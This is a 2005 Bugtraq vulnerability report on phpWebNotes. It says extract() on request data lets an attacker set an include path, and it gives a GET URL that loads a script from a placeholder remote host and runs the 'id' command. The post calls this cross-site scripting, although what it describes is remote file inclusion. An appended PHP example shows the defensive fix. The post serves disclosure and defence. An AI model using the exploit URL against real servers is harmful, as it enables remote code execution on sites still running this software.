Date: Sat, 27 Aug 2005 11:19:22 +0200
From: nf2 <nf2@...einwelt.at>
To: bugtraq@...urityfocus.com
Subject: XSS security hole in phpwebnotes.


Hi security team!

I have found a security hole in a popular PHP application (not
maintained anymore). The hole is already being exploited - our server was
hacked that way two days ago. Probably hackers just use Google to find
installations of phpwebnotes.

Version: phpWebNotes-2.0.0-pr1.tar.gz (last)
----------------------------------------------------------------------

the bug is in php_api.php line 77:

extract($REQUEST);

this allows changing $t_path_core, which is used in api.php:

require_once( $t_path_core . 'constants_inc.php' );

this can be used for a cross site scripting attack.

how does it work:

GET
http://server/xxxxx/api.php?t_path_core=http://pathtohackingscript?&cmd=id

-----------------------------------------------------------------------


http://www.futureware.biz/webnotes/

http://sourceforge.net/projects/webnotes/

regards,

Norbert
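
An added example, not part of the original post and not phpWebNotes code: a PHP illustration of the defensive pattern for the flaw reported above, importing only allow-listed request parameters instead of calling extract() on request data, and resolving include files against a fixed directory. The function names, the `core` directory and the `note_id` parameter are assumptions.

```php
<?php
// Added example, not phpWebNotes code. Function names, the 'core' directory
// and the 'note_id' parameter are assumptions; $t_path_core and
// constants_inc.php are the names from the report.

// Include base comes from the script's own location, never from the request.
define('CORE_PATH', __DIR__ . DIRECTORY_SEPARATOR . 'core');

// Replacement for extract() on request data: copy only the parameters
// named in $allowed, and only if each value matches its pattern.
function import_request_vars(array $request, array $allowed): array
{
    $clean = [];
    foreach ($allowed as $name => $pattern) {
        $value = $request[$name] ?? null;
        if (is_string($value) && preg_match($pattern, $value) === 1) {
            $clean[$name] = $value;
        }
    }
    return $clean;
}

// Resolve a core file and refuse anything that is not inside CORE_PATH
// (URLs, ../ traversal, symlinks pointing elsewhere).
function core_file(string $name): string
{
    $base = realpath(CORE_PATH);
    $path = realpath(CORE_PATH . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('refusing to include ' . $name);
    }
    return $path;
}

// Constructed sample request: one expected parameter, one injected variable.
$request = ['note_id' => '42', 't_path_core' => 'http://example.invalid/x?'];
$vars = import_request_vars($request, ['note_id' => '/^\d{1,10}\z/']);
echo 'imported: ', implode(',', array_keys($vars)), PHP_EOL;

try {
    require_once core_file('constants_inc.php');
} catch (RuntimeException $e) {
    echo $e->getMessage(), PHP_EOL; // e.g. when the core directory is absent
}
```

On current PHP versions, keeping allow_url_include set to Off in php.ini additionally prevents require_once from loading a remote URL.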



